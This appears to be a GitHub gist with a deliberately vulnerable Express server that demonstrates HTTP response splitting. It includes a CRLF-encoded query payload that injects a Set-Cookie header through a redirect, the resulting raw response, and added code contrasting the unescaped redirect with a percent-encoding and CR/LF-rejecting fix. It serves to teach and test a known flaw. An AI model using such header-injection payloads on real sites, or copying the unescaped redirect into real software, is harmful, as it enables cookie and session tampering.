@alpercelik
Created January 21, 2012 23:50
Example Express server for testing an HTTP response splitting attack

// Currently the Express framework does not check for newline characters,
// so it is vulnerable to an HTTP splitting attack.
// Example:
//   start the server
//   browse http://localhost:3000/?foo=bar%0D%0ASet-Cookie%3Aname%3Dvalue
//   you will be redirected to another page and the cookie will be set
var express = require('express');
var app = express.createServer();

app.get('/', function(req, res) {
  var foo = req.query['foo'];
  if (foo) {
    // Deliberately vulnerable: the URL-decoded value (including CR/LF)
    // is concatenated into the Location header unescaped.
    res.redirect('/target?foo=' + foo);
  } else {
    res.send('please provide foo parameter');
  }
});

app.get('/target', function(req, res) {
  var foo = req.query['foo'];
  if (foo) {
    // Echoes the parameter back as the response body.
    res.send(foo);
  } else {
    res.send('foo parameter is empty');
  }
});

app.listen(3000);
console.log('Server running at http://127.0.0.1:3000/');

HTTP/1.1 302 Moved Temporarily
X-Powered-By: Express
Content-Type: text/html
Location: http://localhost:3000/target?foo=bar
Set-Cookie: name=value
Connection: keep-alive
Transfer-Encoding: chunked

b6
<p>Moved Temporarily. Redirecting to <a href="http://localhost:3000/target?foo=bar
Set-Cookie:name=value">http://localhost:3000/target?foo=bar
Set-Cookie:name=value</a></p>
0
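
The redirect target built as in the gist, beside a hardened form that percent-encodes the value and rejects CR/LF before it reaches a header. This is an added example, not part of the original gist; the function names are assumptions, and `serializeHeaders` is a simplified stand-in for a server that writes header values without validation.

```javascript
// Added example: no Express required, runs offline under Node.
const CRLF_RE = /[\r\n]/;

// Mirrors the gist's redirect: the decoded query value is concatenated as-is.
function vulnerableLocation(foo) {
  return '/target?foo=' + foo;
}

// Hardened: percent-encode the value so CR and LF become %0D and %0A again.
// String() also flattens the array Express yields for repeated parameters.
function safeLocation(foo) {
  return '/target?foo=' + encodeURIComponent(String(foo));
}

// Defense in depth: refuse any header value that still contains CR or LF.
function assertHeaderValue(name, value) {
  if (CRLF_RE.test(value)) {
    throw new Error('CR/LF in value for header ' + name);
  }
  return value;
}

// Simplified stand-in for a server that writes header values unvalidated.
function serializeHeaders(location) {
  return [
    'HTTP/1.1 302 Moved Temporarily',
    'Location: ' + location,
    'Connection: keep-alive'
  ].join('\r\n') + '\r\n\r\n';
}

// Header names a client would parse out of the raw header block.
function headerNames(raw) {
  return raw.split('\r\n\r\n')[0].split('\r\n').slice(1)
    .map(function (line) { return line.split(':')[0]; });
}

// Constructed input: what req.query.foo holds after URL decoding
// for the request shown in the gist's comments.
const decoded = decodeURIComponent('bar%0D%0ASet-Cookie%3Aname%3Dvalue');

console.log(headerNames(serializeHeaders(vulnerableLocation(decoded))));
console.log(headerNames(serializeHeaders(safeLocation(decoded))));
```
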